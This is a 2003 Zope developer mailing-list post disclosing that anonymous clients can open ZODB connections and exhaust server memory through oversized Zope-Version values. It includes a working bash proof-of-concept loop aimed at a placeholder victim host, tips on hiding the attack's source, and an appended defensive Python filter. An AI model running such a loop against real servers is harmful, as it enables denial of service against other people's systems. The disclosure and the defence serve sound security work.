small summary and big plea was:(Re: [Zope-dev] Versions: should they die?)

Jamie Heilman jamie@audible.transient.net
Fri, 6 Jun 2003 13:28:40 -0700


Oliver Bleutgen wrote:
> 2. Zope doesn't care if a corresponding Version instance to the value
> of REQUEST['Zope-Version'] exists, more exactly, zope doesn't care for
> the value of that Zope-Version variable at all.

Hmm, it doesn't care, but it does store it in memory.  Pardon my fugly
non-portable bashisms here, but I just wanted to hash out an example:

#!/path/to/bash
exec >/dev/null
h='http://victim.example.com/'
for i in `seq 100`; do
  w3m -dump -post <(perl -e 'print "Zope-Version=",$ARGV[0]x500000' $i) "$h"
done

Quick way to add 100 zodb connections and ~90M to the memory footprint
with relatively little clue of who is responsible assuming traditional
logging; presumably one would get much trickier if they really wanted
to obfuscate the source of attack, slowly crawling the site, changing
the user-agent string, etc.  Under sane resource limits the host is
spared; however, the /Control_Panel/Database/manage_cacheParameters
resource becomes unavailable due to memory constraints.

Other side-effects from allowing anonymous clients to open additional
zodb connections are as of yet unknown to me, anyone care to speculate
on other vectors of abuse?

-- 
Jamie Heilman                   http://audible.transient.net/~jamie/
"We must be born with an intuition of mortality.  Before we know the words
 for it, before we know there are words, out we come bloodied and squalling
 with the knowledge that for all the compasses in the world, there's only
 one direction, and time is its only measure."		-Rosencrantz
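A defender-side check for the Zope-Version variable described above, added here as an example and not part of the thread or of Zope itself. It assumes a hypothetical front-end filter that sees the query string, form body and cookie before Zope does, and that the list of Version objects that actually exist is available to it.

```python
"""Constructed request filter for the Zope-Version abuse discussed in the thread.

Hypothetical front-end check, not Zope's own code: it inspects the Zope-Version
variable a client sends (query string, form body or cookie) and decides whether
to let the request through to Zope at all.
"""
from collections import defaultdict
from urllib.parse import parse_qs

MAX_VERSION_NAME = 64        # assumed cap; real Version ids are short
MAX_DISTINCT_PER_CLIENT = 5  # assumed threshold for flagging a client


class VersionGuard:
    def __init__(self, known_versions, max_len=MAX_VERSION_NAME,
                 max_distinct=MAX_DISTINCT_PER_CLIENT):
        self.known = set(known_versions)   # ids of Version objects that exist
        self.max_len = max_len
        self.max_distinct = max_distinct
        self.seen = defaultdict(set)       # client -> distinct names presented

    @staticmethod
    def extract(query, body, cookie):
        """Return the Zope-Version value from the request, or None if absent."""
        for source in (body, query):       # form body takes precedence
            vals = parse_qs(source, keep_blank_values=True).get("Zope-Version")
            if vals:
                return vals[0]
        for part in cookie.split(";"):
            name, _, value = part.strip().partition("=")
            if name == "Zope-Version":
                return value
        return None

    def check(self, client, query="", body="", cookie=""):
        """Return (allowed, reason) for one request from `client`."""
        version = self.extract(query, body, cookie)
        if version is None:
            return True, "no version requested"
        names = self.seen[client]
        names.add(version[:self.max_len])  # never retain attacker-sized strings
        if len(names) > self.max_distinct:
            return False, "client cycled through %d distinct versions" % len(names)
        if len(version) > self.max_len:
            return False, "version name too long (%d bytes)" % len(version)
        if version not in self.known:
            return False, "no such Version object: %r" % version[:self.max_len]
        return True, "ok"
```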